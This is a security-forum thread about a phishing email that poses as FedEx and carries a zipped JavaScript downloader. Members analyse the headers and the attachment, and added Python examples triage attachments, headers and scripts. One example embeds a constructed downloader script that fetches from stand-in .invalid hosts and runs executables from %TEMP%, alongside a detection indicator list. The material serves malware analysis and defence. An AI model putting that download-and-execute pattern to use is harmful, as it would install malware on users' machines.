is this a malware email?


26 replies to this topic

#1 somae
  • Members
  • 87 posts

Posted 24 March 2015 - 02:52 AM

We got this email recently. It says it's from FedEx. As we've been getting fairly frequent FedEx deliveries I'm not completely sure if it could be something we're expecting, but I'm pretty sure it's not. It has an attached file that the main email says shows the shipment label. The attachment is a zip file and the file it contains is a "doc.jx" file. I'm pretty sure this is a virus so I haven't opened it. I scanned the zip file with Bitdefender and it didn't find anything but, for some reason, there was no option to scan the doc.jx file it contained. (JavaScript?)
 
I'm also pretty sure that FedEx doesn't do things like that. I'm wondering how to be sure it's a virus and who I can report it to. I was thinking of reporting it to SpamCop, but since this probably contains malware, I was thinking it isn't exactly "spam".
 
Thanks.
 
These are the email headers:
 
X-Apparently-To: ; Mon, 23 Mar 2015 17:12:08 +0000
Return-Path: <noreply@secureserver.net>
X-YahooFilteredBulk: 72.167.234.245
Received-SPF: pass (domain of secureserver.net designates 72.167.234.245 as permitted sender)
X-YMailISG: vu4yYcEWLDtQOVCwzbNUwHp34AqMfV38KKZOPWo0CEA1GVMi
 O55f37BaQumB5zhfmuZY25Nre5Y9sb.iHOEiYga4vCouDcCpNtdHonZAB1fd
 7uiHeEJjqWhz71_kmGx5rKhh1R0FmucN92zHQBB5jcSB7Z_aatVII_EYuaFS
 Wt6P_d75hwjPRyfSmvfJr_s7c.jZb6KzlikFrWgcLVnzduXeJmm_QPJSSzJ6
 CN4EIGbiQYF_3P7hK.HKdoLHu8O8bXCXWlV1rh_5IUN9Arkapbx0yBGl7L4O
 YC_gfFpMzuWpLrWQ1NftTo8XS5S3nbzmd8RjtZyXcjHtpZTem61Lrun1IIax
 vKbk0C5OmyrZHDSq6g0D7SvBoYQXhUv3F2k7aZn1PaStfkMMbBEFvBpfg9uZ
 yAKcv7gFJ9h4jhCNN20xLx.Z2dtvDyTpVqwcexkijngExc878GnvNCiZzA.R
 8UWoJZZGJwIxUVGD1XIN02YjpkmiTMuTU8y_dDR52Gd.Eu6R85AAdJqASLhz
 sJ2J7yY1G8jxkpqCDIk7z1w9sk3hd51dpBcW7Cg7gNxVNGSsOb4EIeEA3oBJ
 4SzUM4E6asSfsadKdKSxfjw7DO5Ci4qJDVa_UfoJxwt_v66zV9e89EyvPp2A
 .jSoYcKo.Miq2k8qt0VTCu_WaSFjsoUMJGKCxVMkXKNWV4t7QGp84PkqPpuK
 Rl3RJMyLb5ZbtwDnyCxTSlTMDxxlwM0lhTl9F.c88Qhu39ctLhB3ttSAQoJF
 6510aPZXilwwVnLC1aIgpLjgyysm2KRwg6HE_aERycqU65gdONgqoEiHw9EU
 PCHWI09GCSfWNOFE4uNOVCfEIuONbyq1lk33BL8fP7t__7eatRdALFze2T0b
 b5C_s15PVF4LSzRk0om8cnZuxfHNT_t_zLhSP0BsdpjjXgzQehUzzitn8ZPw
 yhDChY4WhWp_VQkJt5YEv6qoVZnXdHWbWRGMiVSKQnrXR_4bO4W7A0APGX0W
 6xa9dhPgeOtil9WZ4xaaRGYArYjYWhfZb29Kg5Kny_oCEqQ4CiUr7xPXbhmw
 jdWgFBBVTjo_r1AJUfZynRPT0vRdWSRsps4Go7TYQFHb79socvaSz623IRai
 gB3ZU.0Lq_6Dd4tNjkuHIDWIwQweY0HYzJxI.6zZ.2WAm5rBRn90afeAnZwv
 b6ieQ0w7uIWjZltkQ0zVrY_xRRZRxedlROXljd905YZMeTVeSu1jkZDzK_Vj
 aV5I21sItvcyYXTPydhl9bfTHBjSJxiihGDcJmrqfzcJvROS1KyPjZ8WPC.B
 tCL2f5iE8l6ifzolaJ1ydBUVdFah5NryGOihP1yrau3YYXdR2UqjCuJTPObu
 _MclJ_2EXEM.WMIhYtosKneQA68VD2LGgU4VAJbEhq8gZp_x45zcrmCEzlY2
 Sk.5AAqqyZR6g3DlVGa_8_3yvSojY8_XCiCR
X-Originating-IP: [72.167.234.245]
Authentication-Results: mta1234.mail.ne1.yahoo.com  from=ip-198-71-175-30.ip.secureserver.net; domainkeys=neutral (no sig);  from=ip-198-71-175-30.ip.secureserver.net; dkim=neutral (no sig)
Received: from 127.0.0.1  (EHLO p3nlsmtp20.shr.prod.phx3.secureserver.net) (72.167.234.245)
  by mta1234.mail.ne1.yahoo.com with SMTP; Mon, 23 Mar 2015 17:12:07 +0000
Received: from P3NW8SHG326.phx3.gdhosting.gdg ([184.168.27.33])
    by p3nlsmtp20.shr.prod.phx3.secureserver.net with
    id 754R1q00Z0irafs0154R6W; Mon, 23 Mar 2015 10:04:32 -0700
Subject: Problem with parcel shipping, ID:0000543656
To:
X-PHP-Originating-Id: [6585553]
Date: Mon, 23 Mar 2015 10:11:53 -0700
From: "FedEx Standard Overnight" <virgil.lowe@ip-198-71-175-30.ip.secureserver.net>
Reply-To: "FedEx Standard Overnight" <virgil.lowe@ip-198-71-175-30.ip.secureserver.net>
Message-ID: <8727222c4091f1005288b900f442ff76@ip-198-71-175-30.ip.secureserver.net>
X-Priority: 3
MIME-Version: 1.0
Content-Type: multipart/mixed;
    boundary="b1_c84fd0c0d34f0c6530843ba1f95f47bf"
Content-Transfer-Encoding: 8bit
Content-Length: 5781

--b1_c84fd0c0d34f0c6530843ba1f95f47bf
Content-Type: text/plain; charset=us-ascii

Dear

Your parcel has arrived at March 19. Courier was unable to deliver the parcel to you.
Shipment Label is attached to email.

Sincerely,
Virgil Lowe,
Delivery Manager.


--b1_c84fd0c0d34f0c6530843ba1f95f47bf
Content-Type: application/zip; name="0000543656.zip"
Content-Transfer-Encoding: base64

Edited by quietman7, 24 March 2015 - 03:53 PM.
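As an added example (not code from the original post), here is one way to do what somae could not get Bitdefender to do: read the raw message, pull out every attachment, hash it, and list what is inside a ZIP without extracting anything to disk or opening any member. The real attachment's base64 body is not reproduced in the post, so the message below is constructed in memory with a harmless placeholder file named doc.jx; the extension lists and the 5 MB inflate cap are illustrative choices, not anything from the thread.

```python
import base64
import email
import hashlib
import io
import os
import zipfile
from email import policy

# Illustrative extension sets (not exhaustive): what Windows Script Host or the
# shell will run directly, versus what a courier's "label" could plausibly be.
SCRIPT_EXTS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta"}
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd"}
DOCUMENT_EXTS = {".pdf", ".doc", ".docx", ".txt", ".jpg", ".png"}
MAX_MEMBER_BYTES = 5 * 1024 * 1024  # refuse to inflate anything larger (zip-bomb guard)


def classify_name(name: str) -> str:
    """Classify a ZIP member by its final extension. Double extensions such as
    label.pdf.exe resolve to the last one, which is the one Windows honours."""
    ext = os.path.splitext(name)[1].lower()
    if ext in EXECUTABLE_EXTS:
        return "executable"
    if ext in SCRIPT_EXTS:
        return "script"
    if ext in DOCUMENT_EXTS:
        return "document"
    return "unknown-type"


def inspect_zip(data: bytes) -> list:
    """List ZIP members in memory only: nothing is written to disk, and a member
    is read (for hashing) only if its declared size is under the cap."""
    members = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            rec = {"name": info.filename, "size": info.file_size,
                   "flag": classify_name(info.filename), "sha256": None}
            if info.file_size > MAX_MEMBER_BYTES:
                rec["flag"] = "oversized"
            else:
                with zf.open(info) as fh:
                    rec["sha256"] = hashlib.sha256(fh.read()).hexdigest()
            members.append(rec)
    return members


def triage_message(raw: bytes) -> list:
    """Walk every MIME part of a raw RFC 822 message, decode each part that
    carries a filename, hash it, and for ZIPs list what is inside."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    results = []
    for part in msg.walk():
        if part.get_content_maintype() == "multipart":
            continue
        filename = part.get_filename()  # Content-Disposition filename or Content-Type name
        if not filename:
            continue  # body text, not an attachment
        data = part.get_payload(decode=True) or b""
        rec = {"filename": filename, "content_type": part.get_content_type(),
               "size": len(data), "sha256": hashlib.sha256(data).hexdigest(),
               "members": []}
        if zipfile.is_zipfile(io.BytesIO(data)):
            rec["members"] = inspect_zip(data)
        results.append(rec)
    return results


def build_sample_message() -> bytes:
    """Constructed sample, not the real attachment (its base64 body is not in the
    post): a ZIP named like the one in the mail, holding a harmless text file
    named doc.jx, wrapped in headers copied from the post."""
    zbuf = io.BytesIO()
    with zipfile.ZipFile(zbuf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("doc.jx", "// placeholder, not the real script\n")
    b64 = base64.encodebytes(zbuf.getvalue()).decode("ascii")
    boundary = "b1_c84fd0c0d34f0c6530843ba1f95f47bf"
    return (
        'From: "FedEx Standard Overnight" <virgil.lowe@ip-198-71-175-30.ip.secureserver.net>\n'
        "Subject: Problem with parcel shipping, ID:0000543656\n"
        "MIME-Version: 1.0\n"
        f'Content-Type: multipart/mixed; boundary="{boundary}"\n'
        "\n"
        f"--{boundary}\n"
        "Content-Type: text/plain; charset=us-ascii\n"
        "\n"
        "Dear\n\nShipment Label is attached to email.\n"
        "\n"
        f"--{boundary}\n"
        'Content-Type: application/zip; name="0000543656.zip"\n'
        "Content-Transfer-Encoding: base64\n"
        "\n"
        f"{b64}"
        f"--{boundary}--\n"
    ).encode("ascii")


if __name__ == "__main__":
    for att in triage_message(build_sample_message()):
        print(att["filename"], att["content_type"], att["size"], att["sha256"])
        for m in att["members"]:
            print("   ", m["name"], m["size"], m["flag"], m["sha256"])
```

Feed a saved .eml to `triage_message` from inside a throwaway VM, never from the mailbox machine. The per-member SHA-256 values are what you search for or submit to a multi-engine scanner, and the `unknown-type` flag on doc.jx is the cue that whatever it is, it is not a shipping label in any format a courier would send.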



#2 PuReinSAniTY
  • Members
  • 432 posts
  • Gender:Male
  • Location:in a basement

Posted 24 March 2015 - 04:00 AM

Not sure really. Maybe try doing a few searches on Google and see if it comes up with anything. If you can't find anything it is your choice to open or delete it. If it contains malware I am sure the staff here will definitely help with your malware problems. 


they call me te java mayster


#3 Havachat
  • Members
  • 1,039 posts
  • Gender:Male
  • Location:Sleepy Hollow - Geelong - Go Cats.

Posted 24 March 2015 - 04:16 AM

Did you have an invoice number? Does it match the email?

If not, delete it. Why take the chance?

Get on the phone, call them, and confirm it that way.



#4 quietman7
    Bleepin' Janitor
  • Global Moderator
  • 51,117 posts
  • Gender:Male
  • Location:Virginia, USA

Posted 24 March 2015 - 05:25 AM

Crypto malware and other forms of ransomware are typically spread and delivered through social engineering (trickery) and user interaction: opening malicious email attachments (usually from an unknown or unsolicited source), opening infected Word docs with embedded macro viruses, clicking on a malicious link within an email or on a social networking site, and sometimes via exploit kits. Crypto malware can be disguised as fake PDF files in email attachments which appear to be legitimate correspondence from reputable companies such as banks and other financial institutions, or phony FedEx and UPS notices with tracking numbers. Attackers will use email addresses and subjects (purchase orders, bills, complaints, other business communications) such as this example that will entice a user to read the email and open the attachment. Another method involves tricking unwitting users into opening Order Confirmation emails by asking them to confirm an online e-commerce order, purchase or package shipment. Social engineering has become one of the most prolific tactics for distribution of malware, identity theft and fraud.
.
.
Windows Insider MVP 2017-2018
Microsoft MVP Reconnect 2016
Microsoft MVP Consumer Security 2007-2015 kO7xOZh.gif
Member of UNITE, Unified Network of Instructors and Trusted Eliminators

If I have been helpful & you'd like to consider a donation, click 38WxTfO.gif

#5 Aura
    Bleepin' Special Ops
  • Malware Response Team
  • 19,539 posts
  • Gender:Male

Posted 24 March 2015 - 09:07 AM

Hi somae :)

May I ask you to upload that .zip file on ge.tt and maybe PM me the download link (if that's allowed?) so I can take a look at it?

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#6 White Hat Mike
  • Members
  • 312 posts
  • Gender:Male
  • Location:::1

Posted 24 March 2015 - 09:28 AM

Definitely looks like a classic case of social engineering.  You can tell by looking at the "From" header and viewing the e-mail body; notice the terrible grammar, suggesting that the sender may be foreign.  Also, the idea that FedEx's Delivery Manager would e-mail you an invoice from a random e-mail address (not associated with FedEx), let alone that they would e-mail you at all, is highly unlikely.

From: "FedEx Standard Overnight" <virgil.lowe@ip-198-71-175-30.ip.secureserver.net>

Suspicious sender address, above.

Dear

Your parcel has arrived at March 19. Courier was unable to deliver the parcel to you.
Shipment Label is attached to email.

Sincerely,
Virgil Lowe,
Delivery Manager.

No first or last name included in the e-mail; so this is an even less in-depth phishing attempt, likely a very large-scale randomized phishing campaign with harvested e-mail addresses from all around the Internet, rather than a more targeted spear phish-type e-mail.

Also notice the poor grammar; and FedEx would give you a tracking number to type into their official website, not attach the shipping label to an e-mail.

As Aura said, could you please upload the ZIP file to a site like Mega and send me a private message with the download link?

Additionally, uploading the ZIP to VirusTotal will scan it through close to 60 different anti-virus engines to give you more accurate results in regard to whether it is malicious in nature.  But it seems highly likely that it is.


Information Security Engineer | Penetration Tester | Forensic Analyst

CipherTechs.com
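The tells White Hat Mike reads by eye (a brand name in the display name, an address on an unrelated domain, no recipient name) can be checked mechanically. The following is an added example, not part of the post: it parses the headers and body quoted above (copied here as a constructed sample, minus the X-YMailISG blob and the redacted recipient) and returns a list of findings. The brand-to-domain table is an illustrative assumption. Note what the SPF "pass" in the headers actually says: SPF is evaluated on the envelope sender (Return-Path, here secureserver.net), not on the From header, so a passing result is no evidence that the mail has anything to do with FedEx. Likewise, X-PHP-Originating-* headers are added on PHP's mail() path (PHP itself emits X-PHP-Originating-Script; the -Id variant here is presumably the hosting provider's own), which means a web script on the originating box sent this.

```python
import email
import re
from email.utils import parseaddr

# Constructed sample: the headers and body quoted in the post, minus the
# X-YMailISG blob and the redacted recipient. Not a live message.
SAMPLE = """Return-Path: <noreply@secureserver.net>
Received-SPF: pass (domain of secureserver.net designates 72.167.234.245 as permitted sender)
X-Originating-IP: [72.167.234.245]
Authentication-Results: mta1234.mail.ne1.yahoo.com  from=ip-198-71-175-30.ip.secureserver.net; domainkeys=neutral (no sig);  from=ip-198-71-175-30.ip.secureserver.net; dkim=neutral (no sig)
Received: from 127.0.0.1  (EHLO p3nlsmtp20.shr.prod.phx3.secureserver.net) (72.167.234.245)
  by mta1234.mail.ne1.yahoo.com with SMTP; Mon, 23 Mar 2015 17:12:07 +0000
Received: from P3NW8SHG326.phx3.gdhosting.gdg ([184.168.27.33])
    by p3nlsmtp20.shr.prod.phx3.secureserver.net with
    id 754R1q00Z0irafs0154R6W; Mon, 23 Mar 2015 10:04:32 -0700
Subject: Problem with parcel shipping, ID:0000543656
X-PHP-Originating-Id: [6585553]
Date: Mon, 23 Mar 2015 10:11:53 -0700
From: "FedEx Standard Overnight" <virgil.lowe@ip-198-71-175-30.ip.secureserver.net>
Reply-To: "FedEx Standard Overnight" <virgil.lowe@ip-198-71-175-30.ip.secureserver.net>
Message-ID: <8727222c4091f1005288b900f442ff76@ip-198-71-175-30.ip.secureserver.net>
Content-Type: text/plain; charset=us-ascii

Dear

Your parcel has arrived at March 19. Courier was unable to deliver the parcel to you.
Shipment Label is attached to email.
"""

# Brands commonly impersonated in parcel lures and the domains they really
# send from. Illustrative assumption, not a complete list.
BRAND_DOMAINS = {"fedex": ("fedex.com",), "ups": ("ups.com",),
                 "dhl": ("dhl.com",), "usps": ("usps.com",)}

GENERIC_GREETING = re.compile(
    r"(dear|hello|hi|greetings)[\s,:!]*(customer|client|user|sir|madam)?[\s,:!]*", re.I)


def domain_of(addr: str) -> str:
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def in_domain(host: str, base: str) -> bool:
    return host == base or host.endswith("." + base)


def audit_headers(raw: str) -> list:
    """Return (code, detail) findings for the cheap header/body checks a reviewer
    makes by eye: brand vs. address domain, what SPF/DKIM actually vouch for,
    script-generated origin, the injecting host, and an anonymous salutation."""
    msg = email.message_from_string(raw)
    findings = []
    display, from_addr = parseaddr(msg.get("From", ""))
    from_dom = domain_of(from_addr)

    # Brand named in the display name, but the address domain belongs to someone else.
    claimed = [b for b in BRAND_DOMAINS if re.search(r"\b%s\b" % b, display, re.I)]
    for b in claimed:
        if not any(in_domain(from_dom, d) for d in BRAND_DOMAINS[b]):
            findings.append(("brand-mismatch", f'"{display}" sent from {from_dom}'))

    # SPF checks the envelope sender (Return-Path / MAIL FROM), not the From header.
    spf = msg.get("Received-SPF", "")
    result = re.match(r"\s*(\w+)", spf)
    vouched = re.search(r"domain of (\S+)", spf)
    if result and result.group(1).lower() == "pass" and vouched and claimed:
        spf_dom = vouched.group(1).lower().rstrip(".")
        if not any(in_domain(spf_dom, d) for b in claimed for d in BRAND_DOMAINS[b]):
            findings.append(("spf-not-brand", f"SPF pass vouches for {spf_dom}, not {claimed[0]}"))

    # Without a DKIM pass nothing cryptographically ties the From domain to the mail.
    dk = re.search(r"dkim=(\w+)", msg.get("Authentication-Results", ""))
    if not dk or dk.group(1).lower() != "pass":
        findings.append(("no-dkim", "dkim=" + (dk.group(1) if dk else "absent")))

    # X-PHP-Originating-* is stamped on PHP's mail() path: a web script sent this.
    if any(k.lower().startswith("x-php-originating") for k in msg.keys()):
        findings.append(("php-script-origin", "sent by a PHP script, not a mail client"))

    # Reply-To pointing somewhere other than From is a common fraud tell (absent here).
    _, reply = parseaddr(msg.get("Reply-To", ""))
    if reply and reply.lower() != from_addr.lower():
        findings.append(("reply-to-differs", reply))

    # The earliest Received line (last in header order) names the box that injected the mail.
    hops = msg.get_all("Received") or []
    origin = re.search(r"from\s+(\S+)", hops[-1]) if hops else None
    if origin:
        findings.append(("first-hop", origin.group(1)))

    # A salutation with no name is a bulk template, not a notice about your parcel.
    body = msg.get_payload() if not msg.is_multipart() else ""
    first = next((ln.strip() for ln in body.splitlines() if ln.strip()), "")
    if GENERIC_GREETING.fullmatch(first):
        findings.append(("generic-greeting", repr(first)))
    return findings


if __name__ == "__main__":
    for code, detail in audit_headers(SAMPLE):
        print(f"{code:18} {detail}")
```

None of these findings is proof on its own (plenty of legitimate newsletters fail DKIM and greet nobody by name), but brand-mismatch plus spf-not-brand together mean the only thing authenticated here is a GoDaddy shared-hosting box, which is exactly what the Received chain shows.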


#7 quietman7
    Bleepin' Janitor
  • Global Moderator
  • 51,117 posts
  • Gender:Male
  • Location:Virginia, USA

Posted 24 March 2015 - 11:00 AM

May I ask you to upload that .zip file on ge.tt and maybe PM me the download link (if that's allowed?) so I can take a look at it?

We have channels here at BC to upload samples...Submit Malware Sample page

#8 Aura
    Bleepin' Special Ops
  • Malware Response Team
  • 19,539 posts
  • Gender:Male

Posted 24 March 2015 - 11:42 AM

But are we allowed to download these samples after or not?



#9 White Hat Mike
  • Members
  • 312 posts
  • Gender:Male
  • Location:::1

Posted 24 March 2015 - 12:24 PM

May I ask you to upload that .zip file on ge.tt and maybe PM me the download link (if that's allowed?) so I can take a look at it?

We have channels here at BC to upload samples...Submit Malware Sample page

But are we allowed to download these samples after or not?

Don't think regular members can view / download samples, and if so, not sure of what URL to browse to to access the samples.




#10 quietman7
    Bleepin' Janitor
  • Global Moderator
  • 51,117 posts
  • Gender:Male
  • Location:Virginia, USA

Posted 24 March 2015 - 01:08 PM

The submissions are for BC security experts and members of the MRT.

#11 Aura
    Bleepin' Special Ops
  • Malware Response Team
  • 19,539 posts
  • Gender:Male

Posted 24 March 2015 - 01:10 PM

So yes, he can also upload his sample there, so you guys can take a look at it. However, that's why I asked him to upload it to ge.tt and PM me the download link, so I can also take a look at it.



#12 Didier Stevens
  • BC Advisor
  • 2,659 posts
  • Gender:Male

Posted 24 March 2015 - 02:29 PM

There's no need to upload the ZIP, somae has already published it in his first post: the name is 0000543656.zip and the content is base64 encoded. I'm analyzing it now.


Didier Stevens
http://blog.DidierStevens.com
http://DidierStevensLabs.com

SANS ISC Handler
Microsoft MVP 2011-2016 Consumer Security, Windows Insider MVP 2016-2018
MVP_Horizontal_BlueOnly.png

 

If you send me messages, per Bleeping Computer's Forum policy, I will not engage in a conversation, but try to answer your question in the relevant forum post. If you don't want this, don't send me messages.

 

Stevens' law: "As an online security discussion grows longer, the probability of a reference to BadUSB approaches 1.0"


#13 Aura
    Bleepin' Special Ops
  • Malware Response Team
  • 19,539 posts
  • Gender:Male

Posted 24 March 2015 - 02:48 PM

Well of course Didier is much better than me at analyzing malware samples so I'll leave this in his hands :P



#14 Didier Stevens
  • BC Advisor
  • 2,659 posts
  • Gender:Male

Posted 24 March 2015 - 02:49 PM

Yes, it is definitively malicious. It contains a JavaScript script that downloads 3 files from the Internet and executes them.

 

Here is the VirusTotal report for the JavaScript script:

https://www.virustotal.com/en/file/f02756650ce0af45a5e5e09b3f83e860c1483b97cc25d97525ce560153e0f400/analysis/1427225646/




#15 Didier Stevens
  • BC Advisor
  • 2,659 posts
  • Gender:Male

Posted 24 March 2015 - 03:00 PM

Actually, it tries to download and execute 9 files.

 

When I tried to download these, only 6 downloads succeeded, resulting in 2 unique files (executables).

Here is their VirusTotal report:

https://www.virustotal.com/en/file/daf4d96a121c9e4935082d4e0264088ff352f14d868f8720d8fa7e4f99c82f05/analysis/

https://www.virustotal.com/en/file/b4075e73abb294254dc38465f956a39ceb7dcc31c263a7ee54b0e4d820184746/analysis/


Edited by Didier Stevens, 24 March 2015 - 03:20 PM.



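Didier's result (a JavaScript file that fetches several URLs and runs what comes back) is the classic Windows Script Host downloader pattern: MSXML2.XMLHTTP to fetch, ADODB.Stream to write the body under %TEMP%, WScript.Shell.Run to execute it. The example below is added here and is neither Didier's analysis nor the real doc.jx; the script it scans is a constructed stand-in whose hosts use the reserved .invalid TLD, so nothing in it resolves. It folds "a" + "b" string concatenation (a cheap trick that keeps URLs out of a plain grep), extracts the URLs, counts the WSH indicators, and shows how several fetched payloads collapse to their distinct SHA-256 hashes, which is how 6 downloads become 2 unique files.

```python
import hashlib
import re

# Constructed stand-in for the kind of script described in the thread. It is NOT
# the real doc.jx; the hosts use the reserved .invalid TLD and never resolve.
SAMPLE_JS = r'''
var hosts = ["http://one.example.invalid/get.php?id=1", "ht" + "tp://two.exam" + "ple.invalid/get.php?id=2"];
var tmp = new ActiveXObject("WScript.Shell").ExpandEnvironmentStrings("%TEMP%");
for (var i = 0; i < hosts.length; i++) {
  var req = new ActiveXObject("MSXML2.XMLHTTP");
  req.open("GET", hosts[i], false);
  req.send();
  var st = new ActiveXObject("ADODB.Stream");
  st.Open(); st.Type = 1; st.Write(req.responseBody);
  st.SaveToFile(tmp + "\\" + i + ".exe", 2);
  new ActiveXObject("WScript.Shell").Run(tmp + "\\" + i + ".exe");
}
'''

# WSH API strings that, together with a URL, make a downloader. Illustrative list.
INDICATORS = ["ActiveXObject", "MSXML2.XMLHTTP", "ADODB.Stream",
              "SaveToFile", "WScript.Shell", ".Run(", "%TEMP%"]

# Two adjacent double-quoted literals joined by "+" (no escapes inside either).
_CONCAT = re.compile(r'"([^"\\]*)"\s*\+\s*"([^"\\]*)"')


def fold_string_concats(src: str) -> str:
    """Repeatedly merge "a" + "b" into "ab" so a URL split across literals
    becomes a single string the URL regex can see."""
    prev = None
    while prev != src:
        prev, src = src, _CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', src)
    return src


def triage_script(src: str) -> dict:
    """Static look at a script: URLs it references and which WSH download/
    execute primitives it touches. Nothing here evaluates the script."""
    folded = fold_string_concats(src)
    urls = sorted(set(re.findall(r'https?://[^\s"\'<>()]+', folded)))
    hits = [ind for ind in INDICATORS if ind in folded]
    is_downloader = bool(urls) and "ActiveXObject" in hits and (
        "SaveToFile" in hits or ".Run(" in hits)
    return {"urls": urls, "indicators": hits,
            "verdict": "downloader" if is_downloader else "inconclusive"}


def unique_payloads(blobs) -> dict:
    """Collapse several fetched payloads to their distinct SHA-256 hashes; the
    values are the payload bytes so each unique file can be submitted once."""
    return {hashlib.sha256(b).hexdigest(): b for b in blobs}


if __name__ == "__main__":
    report = triage_script(SAMPLE_JS)
    print(report["verdict"])
    for u in report["urls"]:
        print("  url:", u)
    print("  indicators:", ", ".join(report["indicators"]))
    # Constructed stand-in for six fetched responses that turn out to be two files.
    fetched = [b"payload-A", b"payload-B", b"payload-A", b"payload-A", b"payload-B", b"payload-A"]
    print("  unique payloads:", len(unique_payloads(fetched)))
```

The fold step is deliberately naive (double quotes only, no escape handling); real samples add `String.fromCharCode`, `eval`, and array-index indirection on top, at which point you want a proper deobfuscator or a sandboxed run with network blocked. Even so, the indicator list alone is enough to say "this is not a shipping label" without executing anything.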


